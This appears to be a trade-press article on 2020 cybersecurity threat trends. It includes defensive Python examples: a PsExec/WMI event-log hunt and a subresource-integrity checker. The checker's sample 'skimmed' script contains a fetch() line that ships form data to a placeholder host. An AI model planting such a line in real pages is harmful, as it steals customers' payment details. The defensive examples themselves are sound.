Making cybersecurity predictions is fun, but not necessarily helpful to security professionals who must decide which threats they should be most prepared for. “You can't really make a good prediction about what the future's going to hold because it's always the stuff that comes out of left field that really becomes the problem,” says Chad Seaman, senior engineer on Akamai's security intelligence response team.

If your biggest threat for 2020 is something new and unpredictable, how can you best focus your efforts in the coming year? Start by looking at how this year’s biggest threats are likely to change in 2020 in terms of scale and tactics.

CSO has reviewed the leading research on the most common, significant threats of 2019 and asked those researchers for their advice on where those threats will trend and how organizations might adjust their defenses against them in 2020. Here’s what we learned.

Malware infections of devices

Protecting endpoints continues to be a battle for organizations. About half of all organizations suffered a malware infection on company-owned devices in 2019, according to Kaspersky’s IT Security Economics in 2019 report. Half also saw malware infections on employee-owned devices.

For enterprises, malware infections on company devices were the most expensive incident type cited in the Kaspersky report, with an average cost per incident of $2.73 million. For SMBs the figure was far lower, at $117,000.

What to expect in 2020: Dmitry Galov, security researcher at Kaspersky, sees the risk from employee-owned devices increasing in 2020. He sees a greater willingness for companies to allow employees to use their own devices to cut costs, enable remote work, and increase employee satisfaction. As a result, attackers will target personal devices as a way to bypass corporate defenses.
“By default, users’ personal devices tend to be less protected than corporate devices as the average users seldom apply additional measures to protect their phones and computers from potential threats,” he says. “As long as this trend continues, company and employee-owned device infections will arise. This vector of attack remains attractive because the attacker no longer needs to target corporate accounts (for instance, with phishing emails sent to corporate mail).”

Best advice for 2020: Companies must review and update their policies around personal devices, and then enforce those policies, Galov believes. “Strict company policies regarding security, correct rights management and provision of users with security solutions are on the list of must haves to protect the company and its data,” he says. “As well as managing technical issues, security awareness trainings are important because they can cultivate standards of cyber hygiene among employees.”

Phishing

Nearly a third of all breaches in the past year involved phishing, according to the 2019 Verizon Data Breach Investigations Report. For cyber-espionage attacks, that number jumps to 78%. The worst phishing news for 2019 is that its perpetrators are getting much, much better at it thanks to well-produced, off-the-shelf tools and templates.

Akamai’s SOTI Report: Baiting the Hook broke down the phishing-as-a-service offering of one phishing kit developer. This developer runs a storefront and advertises on social media. Prices start at $99 and go up depending on the mailing services selected. All the kits come with security and evasion features. “The low prices and top-tier brand targets are attractive, creating a low bar for entry into the phishing market for criminals looking to set up shop,” said the report’s authors.
Among the top-tier brands targeted are Target, Google, Microsoft, Apple, Lyft and Walmart.

What to expect in 2020: Phishing kit developers will offer more refined products, further lowering the skill required to launch a phishing campaign. According to the IDG Security Priorities Study, 44% of companies say that increasing security awareness and staff training is a top priority for 2020. Attackers will respond by improving the quality of their phishing campaigns, minimizing or hiding the common signs of a phish. Expect greater use of business email compromise (BEC), too, where an attacker sends legitimate-looking phishing attempts through fraudulent or compromised internal or third-party accounts.

Best advice for 2020: Keep your anti-phishing training up to date and make it ongoing. To combat BEC, have policies in place that require any employee receiving a request regarding money or payment instructions to confirm it out of band, for example by phone to a number already on file rather than one supplied in the message.

Ransomware attacks

Ransomware attacks are not the most common cybersecurity incident, but they can be among the most costly. Roughly 40% of SMBs and enterprises experienced a ransomware incident in 2019, according to Kaspersky’s IT Security Economics in 2019 report. At the enterprise level, the average cost per incident was $1.46 million.

Endpoint protection tools are getting better at detecting ransomware, but that has made ransomware developers better students of the techniques those tools use, according to the SophosLabs 2020 Threat Report. “It is a lot easier to change a malware’s appearance than to change its purpose or behavior, which is why modern ransomware relies on obfuscation to be successful,” says Mark Loman, director of engineering for next-generation tech at Sophos. “However, in 2020, ransomware will raise the stakes by changing or adding traits to confuse some anti-ransomware protection.”

Some of that obfuscation is aimed at making the ransomware appear to come from a trusted source.
The Sophos report cites several examples:

- Crafting a script that lists targeted machines and combining it with the PsExec utility from Microsoft Sysinternals, a privileged domain account, and the ransomware binary
- Leveraging a logon/logoff script delivered via a Windows Group Policy Object
- Abusing Windows Management Instrumentation (WMI) to mass-distribute the ransomware inside a network

What to expect in 2020: Loman sees ransomware attackers continuing to tweak their methods to give themselves an edge. “Among the most notable advancements is an increase in ransomware attackers raising the stakes with automated, active attacks that blend human ingenuity with automation tools to cause maximum impact,” he says. “Additionally, by encrypting only a relatively small part of each file or booting the operating system to a diagnostic mode where anti-ransomware protection is often unavailable, attackers will continue to evade most defenses.”

“Ransomware attacks have been loud this year and there is no reason for this type of threat to decline,” says Kaspersky’s Galov. “Ransomware increasingly targets infrastructure, organizations and even smart cities.”

Ransomware developers will make their code more evasive so that they can establish a foothold in a system, encrypt more data without being noticed, and possibly scale operations to other networks. “This year we saw the appearance of attacks even on Network Attached Storage (NAS), which is largely considered secure and safe from such threats,” says Galov.

Best advice for 2020: As always, the best defense against ransomware is to have current, tested backups of all critical data. Keep those backups isolated from your network (offline, or on storage that the domain accounts an attacker would abuse cannot reach) so they, too, aren’t encrypted by the ransomware. Employee training is critical, too.
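The distribution methods the Sophos report lists all leave traces in Windows event logs, so they can be hunted for before the encryption stage starts. The Python below is an added example written for this page (it is not code from Sophos, Kaspersky or CSO): it runs a small hunt over constructed event records shaped like a System log 7045 “service installed” event and a Sysmon event 1 process creation, flagging the PsExec case (a service named PSEXESVC, or a service binary dropped straight into %SystemRoot%) and the WMI case (a process whose parent is WmiPrvSE.exe), then groups hits by account so one credential driving execution on many hosts stands out. Host names, account names and the records themselves are made up; the event IDs, service name and process names are the standard Windows ones. The GPO logon-script case is better caught by auditing changes to Group Policy objects and is not covered here.

```python
"""Hunt for PsExec- and WMI-driven remote execution in Windows event
records. Added example for this page; the records below are constructed."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample records. Field names follow the usual Windows event
# XML names (ServiceName/ImagePath for 7045, Image/ParentImage for Sysmon
# event 1); the hosts, accounts and command lines are made up.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "Host": "fs01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "CORP\\svc_deploy"},
    {"EventID": "7045", "Host": "fs01", "ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": "1", "Host": "ws23", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c \\fs01\share\run.exe", "User": "CORP\\svc_deploy"},
    {"EventID": "1", "Host": "ws23", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe", "User": "CORP\\jdoe"},
]

# PsExec's default service name. A renamed copy (psexec -r) will not match,
# so a second check catches the characteristic "service binary sitting in
# the root of %SystemRoot%" pattern that PsExec and its clones produce.
PSEXEC_SERVICE = re.compile(r"^PSEXESVC", re.IGNORECASE)
ROOT_SERVICE_BINARY = re.compile(r"^%SystemRoot%\\[^\\]+\.exe$", re.IGNORECASE)
# WmiPrvSE.exe is the WMI provider host; processes it spawns were started
# through WMI (Win32_Process.Create), locally or from another machine.
WMI_HOST = re.compile(r"\\WmiPrvSE\.exe$", re.IGNORECASE)


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a technique label for a suspicious event, or None if benign."""
    eid = event.get("EventID")
    if eid == "7045":
        if PSEXEC_SERVICE.search(event.get("ServiceName", "")):
            return "psexec-service-install"
        if ROOT_SERVICE_BINARY.match(event.get("ImagePath", "")):
            return "service-binary-in-systemroot"
        return None
    if eid == "1" and WMI_HOST.search(event.get("ParentImage", "")):
        return "wmi-spawned-process"
    return None


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[Tuple[str, str]]]:
    """Group flagged events by the account involved. One account showing up
    on many hosts in a short window is the mass-distribution signature."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for ev in events:
        label = classify(ev)
        if label:
            who = ev.get("AccountName") or ev.get("User", "?")
            findings.setdefault(who, []).append((ev["Host"], label))
    return findings


if __name__ == "__main__":
    for account, hits in hunt(SAMPLE_EVENTS).items():
        print(account, "->", ", ".join(f"{host}:{label}" for host, label in hits))
```

In production the records would come from a SIEM query rather than a list literal; the point of the grouping is that the privileged domain account the attacker borrowed ties the PsExec service install on one host to the WMI-spawned process on another.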
“In order to protect themselves from ransomware, organizations need to implement strict security policies and introduce cybersecurity trainings to the employees,” says Galov. “Additional protective measures, such as securing access to data, ensuring its backups are stored securely and implementing application whitelisting techniques on servers, are required.”

“It is vital to have robust security controls, monitoring and response in place covering all endpoints, networks and systems, and to install software updates whenever they are issued,” says Loman.

Third-party supplier risk

Enterprises and SMBs saw incidents involving third-party suppliers (both services and products) at similar rates, 43% and 38% respectively, according to Kaspersky’s IT Security Economics in 2019 report. Most organizations (94%) grant third parties access to their network, according to a survey by One Identity, and 72% grant privileged access. Yet only 22% felt confident those third parties weren’t accessing unauthorized information, and 18% reported a breach due to third-party access.

The Kaspersky study shows that both SMBs and enterprises are requiring third-party suppliers to sign security policy agreements: 75% of SMBs and 79% of enterprises use them. That makes a big difference when it comes to getting compensation from third parties responsible for a breach. Of enterprises with a policy in place, 71% reported receiving compensation, while only 22% of companies without a policy did.

What to expect in 2020: Businesses will become more digitally connected with their suppliers and partners. That raises the risk as well as awareness of that risk.
Unfortunately, attackers are becoming more sophisticated.

“Recently, we've observed some new groups such as BARIUM or APT41 engage in sophisticated supply chain attacks against software and hardware manufacturers in order to penetrate secure infrastructures around the world,” says Galov. “These include two sophisticated supply chain attacks uncovered in 2017 and 2019: the CCleaner attack and ShadowPad, and other attacks against gaming companies. Dealing with a compromise from one of these threat actors is a complex process, as they usually leave backdoors allowing them to return later and cause even more havoc.”

Best advice for 2020: Know who has access to your networks and ensure they have only the privileges they need. Have policies in place for communicating and enforcing rules for third-party access. Make sure you have a security policy in place for all your third-party suppliers that spells out responsibilities, security expectations, and what happens when an incident occurs.

“The best organizations can do to protect themselves from such attacks is to make sure that not only they, but also their partners, follow high cybersecurity standards,” says Galov. “If third-party suppliers get any kind of access to internal infrastructure or data, cybersecurity policies should be established before the integration process.”

DDoS attacks

Forty-two percent of enterprises and 38% of SMBs experienced a distributed denial of service (DDoS) attack in 2019, according to Kaspersky’s IT Security Economics in 2019 report. That’s on par with ransomware incidents, which get much more media attention. From a financial perspective, DDoS attacks cost SMBs an average of $138,000.

Attackers continue to innovate to improve the effectiveness of their DDoS attacks. In September, for example, Akamai reported a new DDoS vector: Web Services Dynamic Discovery (WSD), a multicast discovery protocol used to locate services on a local network.
WSD listens on UDP port 3702 and answers a small probe with a much larger response, so when a device exposes it to the internet, attackers can locate such misconfigured devices at scale and use them as reflectors to amplify their DDoS traffic toward a victim.

What to expect in 2020: Kaspersky’s Galov sees DDoS attacks staying “quite prominent” in 2020 thanks to the rise of 5G and the growing number of IoT devices. “The conventional boundaries of critical infrastructure such as water supply, energy grid, military facilities and financial institutions will expand much further to other unprecedented areas in a 5G-connected world,” he says. “All these will require new standards of safety, and the increased speed of connection will pose new challenges in stopping DDoS attacks from happening.”

Best advice for 2020: Do everyone a favor and check your internet-connected devices for misconfigurations and unpatched vulnerabilities. “It's security hygiene, basic security hygiene,” says Akamai’s Seaman.

Unfortunately, that won’t reduce the risk of DDoS attacks aided by connected consumer devices. “Grandma going to Best Buy to pick up a new webcam to put on the driveway so she can see who pulls in isn't going to know about the hygiene of this device,” says Seaman. “That's where we continue to see the bigger problems, and it's not grandma. It's really some guy in Vietnam who has a DVR security system for his small shop. The last of his concerns is whether his webcam is being used to DDoS a bank.”

Application vulnerabilities

According to Veracode’s State of Software Security Vol. 10 report, 83% of the 85,000 applications it tested had at least one security flaw. Many had far more: the research found a total of 10 million flaws, and 20% of all apps had at least one high-severity flaw. That leaves attackers a large supply of exploitable bugs to take advantage of.

The report authors see optimism in some of the data. Fix rates, especially for high-severity flaws, are improving.
The overall fix rate is 56%, up from 52% in 2018, and the highest-severity flaws are fixed at a rate of 75.7%. The biggest positive, however, is that a DevSecOps approach with frequent scanning and testing of software drives down the time to fix flaws. Median time to repair for applications scanned 12 times or fewer per year was 68 days; scanning daily or more often brought that down to 19 days.

What to expect in 2020: Despite the best efforts of security and development teams, vulnerabilities will continue to creep into software. “Most software today is very insecure. That will continue in 2020, especially with 90% of applications using code from open-source libraries,” says Chris Wysopal, co-founder and CTO at Veracode. “We’ve seen some positive AppSec signs in 2019. Organizations are increasingly focused on not just finding security vulnerabilities, but fixing them, and prioritizing the flaws that put them most at risk…. Our data suggests that finding and fixing vulnerabilities is becoming just as much a part of the process as improving functionality.”

Best advice for 2020: As the Veracode research shows, scanning and testing your apps for vulnerabilities more frequently while prioritizing the most severe flaws for fixing is an effective defense. Wysopal also urges companies to keep an eye on security debt. “One of the growing threats within application security is the notion of security debt – whether applications are accruing or eliminating flaws over time,” he says. Growing security debt leaves organizations exposed to attacks.

“Just as with credit card debt, if you start out with a big balance and only pay for each month’s new spending, you’ll never eliminate the balance,” Wysopal says.
“In AppSec, you have to address the new security findings while chipping away at the old.”

Cloud services/hosted infrastructure incidents

Forty-three percent of enterprise businesses had security incidents that affected third-party cloud services in 2019, according to Kaspersky’s IT Security Economics in 2019 report. Although cloud-related incidents didn’t make the SMB most-frequent list, they were expensive for smaller companies, which are often more dependent on hosted services. The average incident affecting hosted infrastructure cost SMBs $162,000.

One area that saw an uptick in activity in 2019 was online payment fraud. The Magecart criminal group in particular was busy this past year. The group takes advantage of cloud misconfigurations (publicly writable storage buckets, for example) to alter the JavaScript that shopping cart pages load, so that card details entered by customers are copied to a server the attackers control. The businesses using the online ecommerce services are unaware of the change until customers complain of fraudulent charges.

Organizations still need to worry about misconfiguring cloud services in a way that leaves data exposed on the internet. Attackers regularly scan the internet to grab this exposed data. Fortunately, cloud platform vendors such as Amazon and Google rolled out new tools and services in 2019 to help organizations properly configure their cloud systems and find errors that leave data unprotected.

What to expect in 2020: The staying power of the malicious code and the financial reward (Magecart’s haul alone is estimated at millions of dollars) mean online payment fraud will increase in 2020. Magecart’s success is bound to inspire imitators. Organizations will counter this and other cloud threats by spending more on cloud security.
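Subresource integrity (SRI) is one of the few client-side controls that stops a Magecart-style modification of a loaded script outright: the browser hashes the fetched script and refuses to run it if the hash does not match the integrity attribute in the tag. The Python below is an added example written for this page (not code from the article or any vendor). It computes the attribute value the way the W3C SRI specification defines it (the algorithm name, a dash, then the base64 of a SHA-256, SHA-384 or SHA-512 digest), generates the script tag a build step would emit, and mirrors the browser’s check against a constructed original cart script and a constructed skimmed copy. The script contents and the collector.invalid hostname are made up.

```python
"""Compute and verify subresource integrity (SRI) hashes for a script.
Added example for this page; the script bodies below are constructed."""
import base64
import hashlib
import re
from typing import Dict, Set

# SRI allows exactly these three digest algorithms.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the integrity attribute value for a script body."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(integrity: str, body: bytes) -> bool:
    """Mirror the browser check. The attribute may carry several hashes;
    the strongest algorithm present is used, and the body passes if its
    digest matches any hash listed for that algorithm. Unlike a browser,
    which ignores an unparseable attribute and loads the script anyway,
    this deployment-time checker fails closed."""
    parsed: Dict[str, Set[str]] = {}
    for token in integrity.split():
        m = re.fullmatch(r"(sha256|sha384|sha512)-([A-Za-z0-9+/=]+)", token)
        if m:
            parsed.setdefault(m.group(1), set()).add(m.group(2))
    if not parsed:
        return False
    strongest = max(parsed, key=lambda a: int(a[3:]))
    actual = sri_hash(body, strongest).split("-", 1)[1]
    return actual in parsed[strongest]


def script_tag(src: str, body: bytes) -> str:
    """Emit the tag a build pipeline would write for a script it just built.
    crossorigin is required for SRI on cross-origin scripts and harmless
    for same-origin ones."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


# Constructed cart script and a constructed skimmed copy: the attacker has
# appended a line that ships the form contents to a host they control.
ORIGINAL_CART_JS = b"function checkout(f){return post('/pay', f)}"
SKIMMED_CART_JS = ORIGINAL_CART_JS + (
    b";fetch('https://collector.invalid/?c='+btoa(JSON.stringify(f)))")


if __name__ == "__main__":
    tag = script_tag("/static/cart.js", ORIGINAL_CART_JS)
    integrity = re.search(r'integrity="([^"]+)"', tag).group(1)
    print(tag)
    print("original loads:", verify_sri(integrity, ORIGINAL_CART_JS))
    print("skimmed loads: ", verify_sri(integrity, SKIMMED_CART_JS))
```

Generate the hash in the build step that produces the script and regenerate it on every intentional change, or the browser will refuse your own update. SRI only covers scripts fetched by URL with an integrity attribute; it does nothing for code injected directly into your HTML, which is why the source code review of the pages themselves still matters.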
According to the IDG Security Priorities Study, only 27% of organizations have cloud data protection technology in production, but 49% are researching or piloting it.

Best advice for 2020: Conduct source code reviews of your ecommerce scripts and implement subresource integrity so that modified scripts are not loaded without your permission. Subresource integrity only protects scripts loaded by URL with an integrity attribute, not code injected directly into your own pages, so the code review is not optional. Make sure your cloud providers conduct assessments of their own code to prevent fraud. Do regular scans for configuration errors that expose your data on the internet.

IoT vulnerabilities

The internet of things (IoT) and the data it generates was the second most impactful trend on security practitioners in 2019, according to the Security Industry Association (SIA) 2019 Security Megatrends report. The growth of IoT is nothing short of manic and difficult to predict. Research firm Statista estimates there will be between 6.6 billion and 30 billion internet-connected devices in 2020, a range too wide to be useful.

The threat IoT poses has been front of mind in 2019 for most organizations. The Marsh Microsoft 2019 Global Risk Perception Survey found that 66% of respondents saw IoT as a cyber risk; 23% rated that risk “extremely high.” “These IoT devices are soft targets for adversaries because they are often unpatched and misconfigured, and they're ‘unmanaged’ because they don't support endpoint security agents,” says Phil Neray, vice president of industrial cybersecurity at CyberX. “As a result, they can easily be compromised by adversaries to gain a foothold in corporate networks, conduct destructive ransomware attacks, steal sensitive intellectual property, and siphon computing resources for DDoS campaigns and cryptojacking.”

CyberX’s 2020 Global IoT/ICS Risk Report breaks down the most common security gaps that left IoT devices vulnerable over the past 12 months. It shows significant improvement in a few areas.
The share of surveyed sites with remotely accessible devices dropped 30 percentage points, to 54%. Sites with devices directly connected to the internet also fell, from 40% to 27%.

On the downside, outdated operating systems were found at 71% of the sites versus 53% the previous year, and 66% of the sites were not running automatic antivirus updates, compared to 43% the previous year.

What to expect in 2020: Neray sees the risk from exposed IoT devices increasing in 2020 as the number of connected devices increases and “the motivation and sophistication of nation-state adversaries and cybercriminals increases.” Industrial environments such as energy utilities, manufacturing, chemicals, pharmaceuticals and oil and gas will especially be at risk, he says. “These compromises can lead to even more serious consequences including costly plant downtime, threats to human safety and environmental incidents.”

Neray identifies building management systems (BMS) as a prime target for attackers. “They're typically deployed by facilities management teams with minimal expertise in security, often unknowingly exposed to the internet, and typically not monitored by corporate security operations centers (SOCs).”

Best advice for 2020: Neray advises companies to follow a multi-layered defense-in-depth strategy incorporating:

- Stronger network segmentation
- Restricted remote access to industrial control networks by third-party contractors, with strong access controls such as 2FA and a password vault
- Agentless network security monitoring to rapidly detect and mitigate IoT attacks before adversaries can blow up or shut down their facilities

Ultimately, the best defense depends more on organizational than on technical approaches.
“In the TRITON attack on the safety systems of a petrochemical facility in Saudi Arabia, for example, one of the key deficiencies was that no one considered themselves ultimately responsible for the security of the industrial control network,” says Neray. “As a result, there were serious lapses in security monitoring and no one checked that the firewalls in the DMZ had been properly configured by the outsourced firms that installed them. Our advice for CISOs is to step up to the plate and take ownership of IoT and OT security and treat IoT and OT security in a holistic manner alongside IT security, integrated into your SOC workflows and security stack.”

Cryptojacking

Let’s end this list with some good news: Cryptomining attacks are expected to decline in 2020. Although cryptomining attacks did not make the most-frequent list for either enterprises or SMBs in Kaspersky’s IT Security Economics in 2019 report, they proved costly for enterprises in 2019. The average financial impact for them was $1.62 million.

What to expect in 2020: Cryptomining incidents rise or fall with cryptocurrency values, and the ease with which attackers can execute a cryptojacking scheme means this threat will persist through 2020 even as it declines. “Mining has been steadily declining throughout 2019 and we do not see any reason for this tendency to change,” says Galov. “Cryptomining has become less profitable, not without the influence of cryptocurrencies that have taken the fight against this threat.”

Best advice for 2020: Use a security solution that detects cryptomining threats and keep an eye out for spikes in cryptocurrency values, which will encourage more cryptojacking attacks.